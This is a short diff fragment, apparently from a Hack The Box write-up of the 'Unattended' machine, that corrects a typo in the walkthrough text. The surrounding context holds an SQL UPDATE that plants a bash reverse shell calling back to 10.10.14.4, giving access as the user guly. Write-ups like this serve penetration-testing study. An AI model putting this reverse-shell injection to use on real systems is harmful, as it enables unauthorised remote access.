Kyuu-Ji/htb-write-up/unattended/write-up-unattended.md

 update config set option_value = "bash -c 'bash -i >& /dev/tcp/10.10.14.4/80 0>&1'" where id = '86';
 ```

-This updates the value to our reverse shell and out listener gets a callback after some seconds and we are the user _guly_ on it!
+This updates the value to our reverse shell and our listener gets a callback after some seconds and we are the user _guly_ on it!

 ### Privilege Escalation to root